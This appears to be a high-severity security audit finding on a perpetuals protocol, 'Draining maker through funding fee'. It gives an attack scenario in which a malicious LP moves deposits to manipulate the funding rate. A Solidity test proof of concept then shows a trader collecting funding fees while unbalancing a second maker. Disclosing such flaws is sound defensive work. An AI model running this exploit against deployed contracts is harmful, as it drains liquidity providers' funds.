Generous Smoke Donkey

high

# Draining maker through funding fee

## Summary

The funding fee is always calculated based on the direction of the basePool skew. The problem is that if another maker is used, its position change will not affect the skew of the basePool. Therefore, a user can open large positions contrary to the skew of the basePool, but in another maker, and receive funding fees for it while seriously unbalancing the second maker.

## Vulnerability Detail

Several observations:

1) The trader receives a portion of the accumulated funding fee proportionate to their notional (in the specified direction). Therefore, if a position is opened and closed in the same block, no funding fees will be accumulated. To make the attack profitable, the position can be closed as early as the next block (OP produces new blocks every 2 seconds). The longer the position is open, the more funding fees it can accumulate in case the balance of the basePool is not restored. However, the risk also increases because it is expected that the basePool balance will be restored in short periods. Also, if a position is open for a long time, a price change may occur, resulting in additional losses or gains.

2) The price pulled from the Pyth network has a maxAge = 60 seconds. Also, even with constant on-chain price updates, it will always be slightly older than the off-chain price. An attacker can use these observations to minimize their risk.

3) In low liquidity in the basePool, it can easily be skewed in a certain direction through a small position from a different address. The loss from it will be minimal compared to the funds drained from the remaining makers.

4) In the function FundingFee.getCurrentFundingRate, we have the following calculations:

    >// maxCapacity = basePool.totalDepositedAmount / basePool.minMarginRatio
    // imbalanceRatio = basePool.openNotional^fundingExponentFactor / maxCapacity
    // fundingRate = fundingFactor * imbalanceRatio
    // funding = trader.openNotional * fundingRate * deltaTimeInSeconds

   From the function FundingFee._calcFundingFee(), it can be seen that the fundingFee is obtained by multiplying the trader's 
   openNotional by the change in fundingGrowthLongIndexMap[marketId]. And fundingGrowthLongIndexMap[marketId] = the sum of 
   fundingRate * time in seconds. If we can maximize the value of fundingFee, more profits can be locked in more easily during the 
   attack. This can be done by manipulating the total deposited amount by a malicious LP. If he deposits a large sum, this would 
   decrease the fundingRate and consequently the fundingFee. If he withdraws this sum, it would increase the fundingRate and 
   fundingFee. The reason is that the divisor maxCapacity changes from the calculations above.

Using the above observations, variations of the attack can be organized. I will describe one such with a Proof of Concept (POC).

Attack scenario:

1) The malicious LP deposits a large sum to keep the fundingFee low and discourage arbitrators from restoring the balance in the basePool.
2) A position is opened. The deposit is withdrawn.
3) The position is closed in the next block, locking in profits.
4) The action can be repeated as long as possible.

<details>
<summary>POC</summary>

```solidity

// drop the test into FundingFee.int.t.sol
// additional params for the setup function 
// config.setFundingConfig(marketId, 0.005e18, 1.3e18, address(maker));
// config.setMaxBorrowingFeeRate(marketId, 10000000000, 10000000000); 

function testStealFundingFee() public 
    {
        vm.prank(taker1);
        clearingHouse.openPosition(
            IClearingHouse.OpenPositionParams({
                marketId: marketId,
                maker: address(maker),
                isBaseToQuote: false,
                isExactInput: false,
                amount: 10 ether,
                oppositeAmountBound: 1000 ether,
                deadline: block.timestamp,
                makerData: ""
            })
        );

        vm.prank(taker2);
        clearingHouse.openPosition(
            IClearingHouse.OpenPositionParams({
                marketId: marketId,
                maker: address(maker2),
                isBaseToQuote: true,
                isExactInput: true,
                amount: 100 ether,
                oppositeAmountBound: 10000 ether,
                deadline: block.timestamp,
                makerData: ""
            })
        );

        vm.prank(address(maker));
        vault.transferMarginToFund(marketId, 5000e6);

        skip(2);

        vm.prank(taker2);
        clearingHouse.closePosition(
            IClearingHouse.ClosePositionParams({
                marketId: marketId,
                maker: address(maker2),
                oppositeAmountBound: 10000 ether,
                deadline: block.timestamp,
                makerData: ""
            })
        );

        console.log("Margin of taker2: %d");
        console.logInt(vault.getMargin(marketId, address(taker2)));

        console.log("Free collateral: %d", vault.getFreeCollateral(marketId, taker2, 100e18));  
    }
```
Finally, I want to note that the sponsor shared in the public Discord that whitelisted LPs are not trusted and are interested in attacks related to them.

## Impact

Loss of funds for the makers.

## Code Snippet

https://github.com/sherlock-audit/2024-02-perpetual/blob/02f17e70a23da5d71364268ccf7ed9ee7cedf428/perp-contract-v3/src/fundingFee/FundingFee.sol#L104-L159

## Tool used

Manual Review

## Recommendation

Use separate funding fee instance for each maker.
